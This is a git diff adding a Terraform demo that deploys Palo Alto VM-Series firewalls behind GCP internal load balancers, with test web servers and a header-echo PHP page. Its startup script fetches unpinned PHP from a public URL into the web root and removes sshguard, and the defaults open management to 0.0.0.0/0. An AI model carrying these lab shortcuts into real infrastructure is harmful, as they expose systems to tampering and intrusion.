Fill-18 + + + + Fill-19 + + + + Fill-20 + + + + Fill-21 + + + + Fill-22 + + + + Fill-23 + + + + + + zone external - grey + + + Project + + + + zone internal - blue + + + + VPC network: testing + + + + + Fill-7 + + + + + Fill-10 + + + + + Fill-1 + + + + Fill-4 + + + + Fill-7 + + + + Fill-9 + + + + Fill-10 + + + + Fill-11 + + + + Fill-12 + + + + Fill-13 + + + + Fill-14 + + + + Fill-15 + + + + + zone internal - green + + + + Region: us-west1 + + + + zone internal - purple + + + + Subnet: 10.30.1.0/24 + + + + + + + + + + + + + - Destination: 10.50.1.0/24 + - Next-hop-ilb = fr-ilb + + + + + + Static routes + + + + Cloud Routes + + Fill-6 + + + + Fill-8 + + + + Fill-10 + + + + + + + + + + + + + + + + - Destination: 10.30.1.0/24 + - Next hop: virtual network + + + + + Subnet routes + + + + Cloud Routes + + Fill-6 + + + + Fill-8 + + + + Fill-10 + + + + + + + + + + + Shuffle + + + + + VPC Routing + + + + + + + + + + + + + + Forwarding rule name : fr-llb1 + IP address: 10.30.1.99 + + + + + Internal Forwarding Rule + + + + + + Fill-7 + + + + + Fill-10 + + + + + Fill-1 + + + + Fill-4 + + + + Fill-7 + + + + Fill-9 + + + + Fill-10 + + + + Fill-11 + + + + Fill-12 + + + + Fill-13 + + + + Fill-14 + + + + Fill-15 + + + + + zone internal - blue + + + + VPC network:production + + + + + Fill-7 + + + + + Fill-10 + + + + + Fill-1 + + + + Fill-4 + + + + Fill-7 + + + + Fill-9 + + + + Fill-10 + + + + Fill-11 + + + + Fill-12 + + + + Fill-13 + + + + Fill-14 + + + + Fill-15 + + + + + + + + + + + + + + - Destination: 10.50.1.0/24 + - Next hop: virtual network + + + + + + Subnet routes + + + + Cloud Routes + + Fill-6 + + + + Fill-8 + + + + Fill-10 + + + + + + + + + + + + Shuffle + + + + + VPC Routing + + + + + zone internal - green + + + + Region: us-west1 + + + + zone internal - purple + + + + Subnet: 10.50.1.0/24 + + + + zone internal - white + + + + Managed Instance Group + third-party-template + + + + + + + + + + Regional Internal + Backend Service + + + + + + + + + + + Source: 10.30.1.100 + Destination: 10.50.1.100 + + + + + + + + + + + Source address translated + Firewall VM performs SNAT + Source: 10.50.1.x + Destination: 10.50.1.100 + + + + + + nic0 + 10.30.1.x + + + + + nic1 + 10.50.1.x + + + + + + + + + + + + + 10.50.1.100 + + + + + production-vm + + + + Compute Engine + + Fill-1 + + + + Fill-4 + + + + Fill-7 + + + + Fill-9 + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Stroke-21 + + + + Stroke-22 + + + + + + + + + can_ip_forward: + True + + + + + Firewall + Instances + + + + Compute Engine + + Fill-1 + + + + Fill-4 + + + + Fill-7 + + + + Fill-9 + + + + + + + + + + + + + + + 10.30.1.100 + + + + + + testing-vm + + + + Compute Engine + + Fill-1 + + + + Fill-4 + + + + Fill-7 + + + + Fill-9 + + + + + + + + + + + + + + + diff --git a/gcp/ilbnh-mig/images/directory.png b/gcp/ilbnh-mig/images/directory.png new file mode 100644 index 00000000..8317ff94 Binary files /dev/null and b/gcp/ilbnh-mig/images/directory.png differ diff --git a/gcp/ilbnh-mig/images/fwlogs.png b/gcp/ilbnh-mig/images/fwlogs.png new file mode 100644 index 00000000..52ea690c Binary files /dev/null and b/gcp/ilbnh-mig/images/fwlogs.png differ diff --git a/gcp/ilbnh-mig/modules/gcp_bootstrap/main.tf b/gcp/ilbnh-mig/modules/gcp_bootstrap/main.tf new file mode 100644 index 00000000..a93e7956 --- /dev/null +++ b/gcp/ilbnh-mig/modules/gcp_bootstrap/main.tf @@ -0,0 +1,85 @@ +locals { + bucket_name = join("", [var.bucket_name, random_string.randomstring.result]) +} +resource "random_string" "randomstring" { + length = 25 + min_lower = 15 + min_numeric = 10 + special = false +} + +resource "google_storage_bucket" "bootstrap" { + name = local.bucket_name + force_destroy = true +} + +resource "google_storage_bucket_object" "config_full" { + count = length(var.config) > 0 ? length(var.config) : "0" + name = "config/${element(var.config, count.index)}" + source = "${var.file_location}${element(var.config, count.index)}" + bucket = google_storage_bucket.bootstrap.name +} + +resource "google_storage_bucket_object" "content_full" { + count = length(var.content) > 0 ? length(var.content) : "0" + name = "content/${element(var.content, count.index)}" + source = "${var.file_location}${element(var.content, count.index)}" + bucket = google_storage_bucket.bootstrap.name +} + +resource "google_storage_bucket_object" "license_full" { + count = length(var.license) > 0 ? length(var.license) : "0" + name = "license/${element(var.license, count.index)}" + source = "${var.file_location}${element(var.license, count.index)}" + bucket = google_storage_bucket.bootstrap.name +} + +resource "google_storage_bucket_object" "software_full" { + count = length(var.software) > 0 ? length(var.software) : "0" + name = "software/${element(var.software, count.index)}" + source = "${var.file_location}${element(var.software, count.index)}" + bucket = google_storage_bucket.bootstrap.name +} + +resource "google_storage_bucket_object" "config_empty" { + count = length(var.config) == 0 ? 1 : 0 + name = "config/" + content = "config/" + bucket = google_storage_bucket.bootstrap.name +} + +resource "google_storage_bucket_object" "content_empty" { + count = length(var.content) == 0 ? 1 : 0 + name = "content/" + content = "content/" + bucket = google_storage_bucket.bootstrap.name +} + +resource "google_storage_bucket_object" "license_empty" { + count = length(var.license) == 0 ? 1 : 0 + name = "license/" + content = "license/" + bucket = google_storage_bucket.bootstrap.name +} + +resource "google_storage_bucket_object" "software_empty" { + count = length(var.software) == 0 ? 1 : 0 + name = "software/" + content = "software/" + bucket = google_storage_bucket.bootstrap.name +} + +resource "null_resource" "dependency_setter" { + depends_on = [ + google_storage_bucket.bootstrap, + google_storage_bucket_object.config_full, + google_storage_bucket_object.content_full, + google_storage_bucket_object.license_full, + google_storage_bucket_object.software_full, + google_storage_bucket_object.config_empty, + google_storage_bucket_object.content_empty, + google_storage_bucket_object.license_empty, + google_storage_bucket_object.software_empty, + ] +} + diff --git a/gcp/ilbnh-mig/modules/gcp_bootstrap/outputs.tf b/gcp/ilbnh-mig/modules/gcp_bootstrap/outputs.tf new file mode 100644 index 00000000..ef7f162d --- /dev/null +++ b/gcp/ilbnh-mig/modules/gcp_bootstrap/outputs.tf @@ -0,0 +1,8 @@ +output completion { + value = null_resource.dependency_setter.id +} + +output bucket_name { + value = google_storage_bucket.bootstrap.name +} + diff --git a/gcp/ilbnh-mig/modules/gcp_bootstrap/variables.tf b/gcp/ilbnh-mig/modules/gcp_bootstrap/variables.tf new file mode 100644 index 00000000..0db2b8fd --- /dev/null +++ b/gcp/ilbnh-mig/modules/gcp_bootstrap/variables.tf @@ -0,0 +1,24 @@ +variable bucket_name { +} + +variable file_location { +} + +variable config { + type = list(string) + default = [] +} + +variable content { + type = list(string) + default = [] +} + +variable license { + type = list(string) + default = [] +} + +variable software { + default = [] +} diff --git a/gcp/ilbnh-mig/modules/ilbnh/main.tf b/gcp/ilbnh-mig/modules/ilbnh/main.tf new file mode 100644 index 00000000..e3491df0 --- /dev/null +++ b/gcp/ilbnh-mig/modules/ilbnh/main.tf @@ -0,0 +1,27 @@ +#----------------------------------------------------------------------------------------------- +# Create the internal load balancers, one for the testing network and one for the production network. +# This resource will destroy (potentially immediately) after null_resource.next +resource "google_compute_region_backend_service" "default" { + provider = "google-beta" + name = var.name + project = var.project_id + load_balancing_scheme = "INTERNAL" + health_checks = var.health_checks + region = var.region + network = var.network_uri + + backend { + group = var.group + } +} + +resource "google_compute_forwarding_rule" "default" { + name = "fr-${var.name}" + region = var.region + load_balancing_scheme = "INTERNAL" + backend_service = google_compute_region_backend_service.default.id + all_ports = var.all_ports + network = var.network + subnetwork = var.subnetwork + ip_address = var.ip_address +} \ No newline at end of file diff --git a/gcp/ilbnh-mig/modules/ilbnh/outputs.tf b/gcp/ilbnh-mig/modules/ilbnh/outputs.tf new file mode 100644 index 00000000..d99cc408 --- /dev/null +++ b/gcp/ilbnh-mig/modules/ilbnh/outputs.tf @@ -0,0 +1,3 @@ +output forwarding_rule { + value = google_compute_forwarding_rule.default.self_link +} \ No newline at end of file diff --git a/gcp/ilbnh-mig/modules/ilbnh/variables.tf b/gcp/ilbnh-mig/modules/ilbnh/variables.tf new file mode 100644 index 00000000..585f8276 --- /dev/null +++ b/gcp/ilbnh-mig/modules/ilbnh/variables.tf @@ -0,0 +1,41 @@ +variable project_id { +} + +variable region { +} + +variable name { +} + +variable health_checks { + type = list(string) + default = [] +} + +variable group { +} + +variable subnetwork { +} + +variable ip_address { + default = null +} + +variable ip_protocol { + default = "TCP" +} +variable all_ports { + type = bool +} +variable ports { + type = list(string) + default = [] +} + +variable network { + default = null +} + +variable network_uri { +} \ No newline at end of file diff --git a/gcp/ilbnh-mig/modules/vm/main.tf b/gcp/ilbnh-mig/modules/vm/main.tf new file mode 100644 index 00000000..fff23b2e --- /dev/null +++ b/gcp/ilbnh-mig/modules/vm/main.tf @@ -0,0 +1,34 @@ +resource "google_compute_instance" "default" { + count = length(var.names) + name = element(var.names, count.index) + machine_type = var.machine_type + zone = element(var.zones, count.index) + can_ip_forward = false + allow_stopping_for_update = true + metadata_startup_script = var.startup_script + + metadata = { + serial-port-enable = true + ssh-keys = var.ssh_key + } + + network_interface { + dynamic "access_config" { + for_each = var.server_public_ip ? [""] : [] + content {} + } + subnetwork = element(var.subnetworks, count.index) + network_ip = element(var.server_ips, count.index) + + } + + boot_disk { + initialize_params { + image = var.image + } + } + + service_account { + scopes = var.scopes + } +} \ No newline at end of file diff --git a/gcp/ilbnh-mig/modules/vm/outputs.tf b/gcp/ilbnh-mig/modules/vm/outputs.tf new file mode 100644 index 00000000..75856670 --- /dev/null +++ b/gcp/ilbnh-mig/modules/vm/outputs.tf @@ -0,0 +1,7 @@ +output vm_names { + value = google_compute_instance.default.*.name +} + +output vm_self_link { + value = google_compute_instance.default.*.self_link +} \ No newline at end of file diff --git a/gcp/ilbnh-mig/modules/vm/variables.tf b/gcp/ilbnh-mig/modules/vm/variables.tf new file mode 100644 index 00000000..76b51bf5 --- /dev/null +++ b/gcp/ilbnh-mig/modules/vm/variables.tf @@ -0,0 +1,44 @@ +variable names { + type = list(string) +} + +variable machine_type { +} + +variable zones { + type = list(string) +} +variable ssh_key { + default = "" +} +variable image { +} + +variable subnetworks { + type = list(string) +} + +variable server_ips { + type = list(string) +} + +variable scopes { + type = list(string) + + default = [ + "https://www.googleapis.com/auth/cloud.useraccounts.readonly", + "https://www.googleapis.com/auth/devstorage.read_only", + "https://www.googleapis.com/auth/logging.write", + "https://www.googleapis.com/auth/monitoring.write", + ] +} + +variable startup_script { + default = "" +} + +variable server_public_ip { + type = bool + default = false +} + diff --git a/gcp/ilbnh-mig/modules/vmseries/main.tf b/gcp/ilbnh-mig/modules/vmseries/main.tf new file mode 100644 index 00000000..0b78dd00 --- /dev/null +++ b/gcp/ilbnh-mig/modules/vmseries/main.tf @@ -0,0 +1,84 @@ +resource "google_compute_instance_template" "vmseries" { + name = "vmseries-template" + description = "This template is used to create firewall instances." + instance_description = "VM-Series for ILBNH" + region = var.region + machine_type = var.machine_type + min_cpu_platform = var.cpu_platform + can_ip_forward = true + tags = var.tags + + scheduling { + automatic_restart = true + on_host_maintenance = "MIGRATE" + } + + metadata = { + mgmt-interface-swap = var.mgmt_interface_swap + vmseries-bootstrap-gce-storagebucket = var.bootstrap_bucket + serial-port-enable = true + ssh-keys = var.ssh_key + } + + service_account { + scopes = var.scopes + } + + network_interface { + + dynamic "access_config" { + for_each = var.nic0_public_ip ? [""] : [] + content {} + } + subnetwork = var.subnetworks[0] + } + + network_interface { + dynamic "access_config" { + for_each = var.nic1_public_ip ? [""] : [] + content {} + } + subnetwork = var.subnetworks[1] + } + + network_interface { + dynamic "access_config" { + for_each = var.nic2_public_ip ? [""] : [] + content {} + } + subnetwork = var.subnetworks[2] + } + + network_interface { + dynamic "access_config" { + for_each = var.nic3_public_ip ? [""] : [] + content {} + } + subnetwork = var.subnetworks[3] + } + + disk { + source_image = var.image + type = var.disk_type + } + + lifecycle { + create_before_destroy = "true" + } +} + +resource "google_compute_region_instance_group_manager" "vmseries_rigm" { + name = "vmseries-rigm" + base_instance_name = var.base_name + region = var.region + target_size = var.target_size + + version { + instance_template = google_compute_instance_template.vmseries.self_link + } + + named_port { + name = "http" + port = "80" + } +} \ No newline at end of file diff --git a/gcp/ilbnh-mig/modules/vmseries/outputs.tf b/gcp/ilbnh-mig/modules/vmseries/outputs.tf new file mode 100644 index 00000000..11bd3b53 --- /dev/null +++ b/gcp/ilbnh-mig/modules/vmseries/outputs.tf @@ -0,0 +1,3 @@ +output vmseries_rigm { + value = google_compute_region_instance_group_manager.vmseries_rigm.instance_group +} \ No newline at end of file diff --git a/gcp/ilbnh-mig/modules/vmseries/variables.tf b/gcp/ilbnh-mig/modules/vmseries/variables.tf new file mode 100644 index 00000000..271a7b55 --- /dev/null +++ b/gcp/ilbnh-mig/modules/vmseries/variables.tf @@ -0,0 +1,121 @@ +variable networks { + type = list(string) +} + +variable subnetworks { + type = list(string) +} + +variable base_name { +} + +variable machine_type { +} + +variable region { +} + +variable zones { + type = list(string) +} + +variable cpu_platform { + default = "Intel Broadwell" +} +variable disk_type { + default = "pd-ssd" +} +variable bootstrap_bucket { + default = "" +} + +variable ssh_key { + default = "" +} + +variable public_lb_create { + default = false +} + +variable target_size { + default = "1" +} + +variable scopes { + type = list(string) + + default = [ + "https://www.googleapis.com/auth/compute.readonly", + "https://www.googleapis.com/auth/cloud.useraccounts.readonly", + "https://www.googleapis.com/auth/devstorage.read_only", + "https://www.googleapis.com/auth/logging.write", + "https://www.googleapis.com/auth/monitoring.write", + ] +} + +variable image { +} + +variable tags { + type = list(string) + default = [] +} + +variable create_instance_group { + type = bool + default = false +} + +variable instance_group_names { + type = list(string) + default = ["vmseries-instance-group"] +} + +variable dependencies { + type = list(string) + default = [] +} + +variable mgmt_interface_swap { + default = "" +} + +variable nic0_ip { + type = list(string) + default = [""] +} + +variable nic1_ip { + type = list(string) + default = [""] +} + +variable nic2_ip { + type = list(string) + default = [""] +} + +variable nic3_ip { + type = list(string) + default = [""] +} + +variable nic0_public_ip { + type = bool + default = false +} + +variable nic1_public_ip { + type = bool + default = false +} + +variable nic2_public_ip { + type = bool + default = false +} + +variable nic3_public_ip { + type = bool + default = false +} \ No newline at end of file diff --git a/gcp/ilbnh-mig/modules/vpc/main.tf b/gcp/ilbnh-mig/modules/vpc/main.tf new file mode 100644 index 00000000..6c681d08 --- /dev/null +++ b/gcp/ilbnh-mig/modules/vpc/main.tf @@ -0,0 +1,25 @@ +resource "google_compute_network" "default" { + name = var.vpc + delete_default_routes_on_create = var.delete_default_route + auto_create_subnetworks = false +} + +resource "google_compute_subnetwork" "default" { + name = var.subnet + ip_cidr_range = var.cidr + region = var.region + network = google_compute_network.default.self_link +} + +resource "google_compute_firewall" "default" { + count = length(var.allowed_sources) != 0 ? 1 : 0 + name = "${google_compute_network.default.name}-ingress" + network = google_compute_network.default.self_link + direction = "INGRESS" + source_ranges = var.allowed_sources + + allow { + protocol = var.allowed_protocol + ports = var.allowed_ports + } +} \ No newline at end of file diff --git a/gcp/ilbnh-mig/modules/vpc/outputs.tf b/gcp/ilbnh-mig/modules/vpc/outputs.tf new file mode 100644 index 00000000..dbf7ed78 --- /dev/null +++ b/gcp/ilbnh-mig/modules/vpc/outputs.tf @@ -0,0 +1,29 @@ +output network_self_link { +# value = google_compute_network.default.*.self_link + value = google_compute_network.default.self_link +} + +output subnetwork_id { + value = google_compute_subnetwork.default.*.id +} + +output subnetwork_name { + value = google_compute_subnetwork.default.*.name +} + +output subnetwork_self_link { +# value = google_compute_subnetwork.default.*.self_link + value = google_compute_subnetwork.default.self_link +} + +output vpc_name { + value = google_compute_network.default.*.name +} + +output vpc_id { + value = google_compute_network.default.*.id[0] +} + +output vpc_self_link { + value = google_compute_network.default.*.self_link[0] +} \ No newline at end of file diff --git a/gcp/ilbnh-mig/modules/vpc/variables.tf b/gcp/ilbnh-mig/modules/vpc/variables.tf new file mode 100644 index 00000000..04407a0d --- /dev/null +++ b/gcp/ilbnh-mig/modules/vpc/variables.tf @@ -0,0 +1,29 @@ +variable vpc { +} + +variable subnet { +} + +variable cidr { +} + +variable region { +} + +variable allowed_sources { + type = list(string) + default = [] +} + +variable allowed_protocol { + default = "all" +} + +variable allowed_ports { + type = list(string) + default = [] +} + +variable delete_default_route { + default = "false" +} \ No newline at end of file diff --git a/gcp/ilbnh-mig/project.tf b/gcp/ilbnh-mig/project.tf new file mode 100644 index 00000000..a65b533f --- /dev/null +++ b/gcp/ilbnh-mig/project.tf @@ -0,0 +1,15 @@ +terraform { + required_version = ">= 0.12" +} + +provider "google" { + credentials = var.auth_file + project = var.project_id + region = var.region +} + +provider "google-beta" { + version = "> 2.50.0" +} + +data "google_compute_zones" "available" {} \ No newline at end of file diff --git a/gcp/ilbnh-mig/scripts/showheaders.php b/gcp/ilbnh-mig/scripts/showheaders.php new file mode 100644 index 00000000..19c37318 --- /dev/null +++ b/gcp/ilbnh-mig/scripts/showheaders.php @@ -0,0 +1,62 @@ + + SOURCE & DESTINATION ADDRESSES +
'; +echo ''. "INTERVAL" .': '. $time .'
'; +$localIPAddress = getHostByName(getHostName()); +$sourceIPAddress = getRealIpAddr(); +echo ''. "SOURCE IP" .': '. $sourceIPAddress .'
'; +echo ''. "LOCAL IP" .': '. $localIPAddress .'
'; + +$vm_name = gethostname(); +echo ''. "VM NAME" .': '. $vm_name .'
'; +echo ''. '
'; +echo ' + HEADER INFORMATION +
'; +/* All $_SERVER variables prefixed with HTTP_ are the HTTP headers */ +foreach ($_SERVER as $header => $value) { + if (substr($header, 0, 5) == 'HTTP_') { + /* Strip the HTTP_ prefix from the $_SERVER variable, what remains is the header */ + $clean_header = strtolower(substr($header, 5, strlen($header))); + + /* Replace underscores by the dashes, as the browser sends them */ + $clean_header = str_replace('_', '-', $clean_header); + + /* Cleanup: standard headers are first-letter uppercase */ + $clean_header = ucwords($clean_header, " \t\r\n\f\v-"); + + /* And show'm */ + echo ''. $header .': '. $value .'
'; + } +} +?> diff --git a/gcp/ilbnh-mig/scripts/webserver-startup.sh b/gcp/ilbnh-mig/scripts/webserver-startup.sh new file mode 100644 index 00000000..a19aefe9 --- /dev/null +++ b/gcp/ilbnh-mig/scripts/webserver-startup.sh @@ -0,0 +1,9 @@ +#!/bin/bash +until sudo apt-get update; do echo "Retrying"; sleep 2; done +until sudo apt-get install -y php; do echo "Retrying"; sleep 2; done +until sudo apt-get install -y apache2; do echo "Retrying"; sleep 2; done +until sudo apt-get install -y libapache2-mod-php; do echo "Retrying"; sleep 2; done +until sudo rm -f /var/www/html/index.html; do echo "Retrying"; sleep 2; done +until sudo wget -O /var/www/html/index.php https://raw.githubusercontent.com/wwce/terraform/master/gcp/adv_peering_4fw_2spoke/scripts/showheaders.php; do echo "Retrying"; sleep 2; done +until sudo systemctl restart apache2; do echo "Retrying"; sleep 2; done +until sudo apt-get autoremove -y --purge sshguard; do echo "Retrying"; sleep 2; done \ No newline at end of file diff --git a/gcp/ilbnh-mig/servers.tf b/gcp/ilbnh-mig/servers.tf new file mode 100644 index 00000000..fe563ba5 --- /dev/null +++ b/gcp/ilbnh-mig/servers.tf @@ -0,0 +1,29 @@ +#----------------------------------------------------------------------------------------------- +# Create N webservers in one subnet. N is determined by the number of hostnames in the list +module "server1" { + source = "./modules/vm/" + names = var.server1_vms + zones = [data.google_compute_zones.available.names[0]] + subnetworks = [module.vpc0.subnetwork_self_link] + server_ips = var.server1_ips + server_public_ip = var.server_public_ip + machine_type = var.server_size + image = var.server_image + ssh_key = fileexists(var.public_key_path) ? "${var.server_user}:${file(var.public_key_path)}" : "" + startup_script = file("${path.module}/scripts/webserver-startup.sh") +} + +#----------------------------------------------------------------------------------------------- +# Create X webservers in another subnet. X is determined by the number of hostnames in the list +module "server2" { + source = "./modules/vm/" + names = var.server2_vms + zones = [data.google_compute_zones.available.names[0]] + subnetworks = [module.vpc2.subnetwork_self_link] + server_ips = var.server2_ips + server_public_ip = var.server_public_ip + machine_type = var.server_size + image = var.server_image + ssh_key = fileexists(var.public_key_path) ? "${var.server_user}:${file(var.public_key_path)}" : "" + startup_script = file("${path.module}/scripts/webserver-startup.sh") +} \ No newline at end of file diff --git a/gcp/ilbnh-mig/terraform.tfvars b/gcp/ilbnh-mig/terraform.tfvars new file mode 100644 index 00000000..31dd7687 --- /dev/null +++ b/gcp/ilbnh-mig/terraform.tfvars @@ -0,0 +1,48 @@ +project_id = "" +auth_file = "" +public_key_path = "" # Your SSH Key + +#fw_panos = "byol-904" # Uncomment for PAN-OS 9.0.4 - BYOL +fw_panos = "bundle1-904" # Uncomment for PAN-OS 9.0.4 - PAYG Bundle 1 +#fw_panos = "bundle2-904" # Uncomment for PAN-OS 9.0.4 - PAYG Bundle 2 + + +#------------------------------------------------------------------- +region = "us-central1" + +vpc0 = "testing" +vpc0_subnet = "testing-subnet" +vpc0_cidr = "10.30.1.0/24" + +vpc1 = "mgmt" +vpc1_subnet = "mgmt-subnet" +vpc1_cidr = "10.60.1.0/24" + +vpc2 = "production" +vpc2_subnet = "production-subnet" +vpc2_cidr = "10.50.1.0/24" + +vpc3 = "production2" +vpc3_subnet = "production2-subnet" +vpc3_cidr = "10.40.1.0/24" + +fw_base_name = "vmseries" +fw_machine_type = "n1-standard-4" +target_size = "1" + +mgmt_sources = ["0.0.0.0/0"] +health_check_port = "22" +all_ports = true + +server_user = "demo" +server_size = "f1-micro" +server_image = "ubuntu-os-cloud/ubuntu-1604-lts" +server_public_ip = true +server1_vms = ["testing-vm"] +server1_ips = ["10.30.1.100"] + +server2_vms = ["production-vm"] +server2_ips = ["10.50.1.100"] + +ilb1_ip = "10.30.1.99" +ilb2_ip = "10.50.1.99" diff --git a/gcp/ilbnh-mig/variables.tf b/gcp/ilbnh-mig/variables.tf new file mode 100644 index 00000000..98a46495 --- /dev/null +++ b/gcp/ilbnh-mig/variables.tf @@ -0,0 +1,122 @@ +variable project_id { + description = "GCP Project ID" +} + +variable auth_file { + description = "GCP Project auth file" + default = "" +} + +variable region { +} + +variable fw_panos { + description = "VM-Series license and PAN-OS (ie: bundle1-814, bundle2-814, or byol-814)" +} + +variable fw_image { + default = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries" +} + +variable fw_base_name { +} + +variable target_size { +} + +variable fw_machine_type { +} + +variable mgmt_sources { + type = list(string) +} + +variable health_check_port { + description = "Port the ILB will health check" + default = "22" +} + +variable all_ports { + description = "Enable all ports on the ILB" + default = true +} +variable vpc1 { +} + +variable vpc1_subnet { +} + +variable vpc1_cidr { +} + +variable vpc0 { +} + +variable vpc0_subnet { +} + +variable vpc0_cidr { +} + +variable vpc2 { +} + +variable vpc2_subnet { +} + +variable vpc2_cidr { +} + +variable vpc3 { +} + +variable vpc3_subnet { +} + +variable vpc3_cidr { +} + +variable server1_vms { + type = list(string) +} + +variable server1_ips { + type = list(string) +} + +variable server2_vms { + type = list(string) +} + +variable server_user { + description = "SSH user for Linux VM" +} + +variable server2_ips { + type = list(string) +} + +variable server_size { + description = "Machine size for the server VMs" +} + +variable server_image { + description = "OS image for server installation" +} + +variable server_public_ip { + description = "Should we assign a public IP to the server" + default = false +} + +variable public_key_path { + description = "Local path to public SSH key. If you do not have a public key, run >> ssh-keygen -f ~/.ssh/demo-key -t rsa -C admin" +} + +variable ilb1_ip { + description = "IP address for ILB1" +} + +variable ilb2_ip { + description = "IP address for ILB2" +} diff --git a/gcp/k8s-Prisma-API/.gitignore b/gcp/k8s-Prisma-API/.gitignore new file mode 100644 index 00000000..8d51dd09 --- /dev/null +++ b/gcp/k8s-Prisma-API/.gitignore @@ -0,0 +1,2 @@ +# pycharm +.DS_Store diff --git a/gcp/k8s-Prisma-API/.meta-cnc.yaml b/gcp/k8s-Prisma-API/.meta-cnc.yaml new file mode 100644 index 00000000..e651d353 --- /dev/null +++ b/gcp/k8s-Prisma-API/.meta-cnc.yaml @@ -0,0 +1,43 @@ +name: gke_k8s_EW_inspection + +# label should be a human readable label that conveys what this skillet will do +label: GCP 4-node k8s cluster with VM-Series Firewall + +description: This skillet deploys a 4-node GCP k8s cluster with a VM-Series Firewall for both N/S and E/W Inspection. This is the base deployment used in the Ignite 19 k8s HOW lab. There is also a guide that walks through deploying a 2 tier container application and Prisma Public Cloud API scanning. + +# type instructs Panhandler how to consume this skillet +type: terraform + +# extends allows you to include other skillets along with this one +extends: + +# labels allow extensible configuration options per skillet type. For example, lables can be used to +# group multiple skillets of the same type (pan-os skillets labeled as version: 9.0 for example) +labels: + collection: GCP K8s Prisma API + + +# Variables will be presented to the user via the Panhandler GUI. These values will then be passed to +# the terraform binary as '--var' options, thus overriding any tfvars entries. +# Variable names MUST match the names of the defined terraform variables +variables: + - name: container-ver + description: GCP Container Ver + default: 1.11.10-gke.4 + type_hint: gcloud container get-server-config --zone us-central1 + - name: my_gcp_project + description: GCP Project + default: djs-gcp-2018 + type_hint: project id + - name: region + description: GCP Region + default: us-central1 + type_hint: text + - name: zone + description: GCP Zone + default: us-central1-a + type_hint: text + - name: credentials_file_path + description: Path to the JSON file used to describe your account credentials + default: djs-gcp-2018-creds.json + type_hint: text diff --git a/gcp/k8s-Prisma-API/LICENSE b/gcp/k8s-Prisma-API/LICENSE new file mode 100644 index 00000000..261eeb9e --- /dev/null +++ b/gcp/k8s-Prisma-API/LICENSE @@ -0,0 +1,201 @@ + Apache License + Version 2.0, January 2004 + http://www.apache.org/licenses/ + + TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION + + 1. Definitions. + + "License" shall mean the terms and conditions for use, reproduction, + and distribution as defined by Sections 1 through 9 of this document. + + "Licensor" shall mean the copyright owner or entity authorized by + the copyright owner that is granting the License. + + "Legal Entity" shall mean the union of the acting entity and all + other entities that control, are controlled by, or are under common + control with that entity. For the purposes of this definition, + "control" means (i) the power, direct or indirect, to cause the + direction or management of such entity, whether by contract or + otherwise, or (ii) ownership of fifty percent (50%) or more of the + outstanding shares, or (iii) beneficial ownership of such entity. + + "You" (or "Your") shall mean an individual or Legal Entity + exercising permissions granted by this License. + + "Source" form shall mean the preferred form for making modifications, + including but not limited to software source code, documentation + source, and configuration files. + + "Object" form shall mean any form resulting from mechanical + transformation or translation of a Source form, including but + not limited to compiled object code, generated documentation, + and conversions to other media types. + + "Work" shall mean the work of authorship, whether in Source or + Object form, made available under the License, as indicated by a + copyright notice that is included in or attached to the work + (an example is provided in the Appendix below). + + "Derivative Works" shall mean any work, whether in Source or Object + form, that is based on (or derived from) the Work and for which the + editorial revisions, annotations, elaborations, or other modifications + represent, as a whole, an original work of authorship. For the purposes + of this License, Derivative Works shall not include works that remain + separable from, or merely link (or bind by name) to the interfaces of, + the Work and Derivative Works thereof. + + "Contribution" shall mean any work of authorship, including + the original version of the Work and any modifications or additions + to that Work or Derivative Works thereof, that is intentionally + submitted to Licensor for inclusion in the Work by the copyright owner + or by an individual or Legal Entity authorized to submit on behalf of + the copyright owner. For the purposes of this definition, "submitted" + means any form of electronic, verbal, or written communication sent + to the Licensor or its representatives, including but not limited to + communication on electronic mailing lists, source code control systems, + and issue tracking systems that are managed by, or on behalf of, the + Licensor for the purpose of discussing and improving the Work, but + excluding communication that is conspicuously marked or otherwise + designated in writing by the copyright owner as "Not a Contribution." + + "Contributor" shall mean Licensor and any individual or Legal Entity + on behalf of whom a Contribution has been received by Licensor and + subsequently incorporated within the Work. + + 2. Grant of Copyright License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + copyright license to reproduce, prepare Derivative Works of, + publicly display, publicly perform, sublicense, and distribute the + Work and such Derivative Works in Source or Object form. + + 3. Grant of Patent License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + (except as stated in this section) patent license to make, have made, + use, offer to sell, sell, import, and otherwise transfer the Work, + where such license applies only to those patent claims licensable + by such Contributor that are necessarily infringed by their + Contribution(s) alone or by combination of their Contribution(s) + with the Work to which such Contribution(s) was submitted. If You + institute patent litigation against any entity (including a + cross-claim or counterclaim in a lawsuit) alleging that the Work + or a Contribution incorporated within the Work constitutes direct + or contributory patent infringement, then any patent licenses + granted to You under this License for that Work shall terminate + as of the date such litigation is filed. + + 4. Redistribution. You may reproduce and distribute copies of the + Work or Derivative Works thereof in any medium, with or without + modifications, and in Source or Object form, provided that You + meet the following conditions: + + (a) You must give any other recipients of the Work or + Derivative Works a copy of this License; and + + (b) You must cause any modified files to carry prominent notices + stating that You changed the files; and + + (c) You must retain, in the Source form of any Derivative Works + that You distribute, all copyright, patent, trademark, and + attribution notices from the Source form of the Work, + excluding those notices that do not pertain to any part of + the Derivative Works; and + + (d) If the Work includes a "NOTICE" text file as part of its + distribution, then any Derivative Works that You distribute must + include a readable copy of the attribution notices contained + within such NOTICE file, excluding those notices that do not + pertain to any part of the Derivative Works, in at least one + of the following places: within a NOTICE text file distributed + as part of the Derivative Works; within the Source form or + documentation, if provided along with the Derivative Works; or, + within a display generated by the Derivative Works, if and + wherever such third-party notices normally appear. The contents + of the NOTICE file are for informational purposes only and + do not modify the License. You may add Your own attribution + notices within Derivative Works that You distribute, alongside + or as an addendum to the NOTICE text from the Work, provided + that such additional attribution notices cannot be construed + as modifying the License. + + You may add Your own copyright statement to Your modifications and + may provide additional or different license terms and conditions + for use, reproduction, or distribution of Your modifications, or + for any such Derivative Works as a whole, provided Your use, + reproduction, and distribution of the Work otherwise complies with + the conditions stated in this License. + + 5. Submission of Contributions. Unless You explicitly state otherwise, + any Contribution intentionally submitted for inclusion in the Work + by You to the Licensor shall be under the terms and conditions of + this License, without any additional terms or conditions. + Notwithstanding the above, nothing herein shall supersede or modify + the 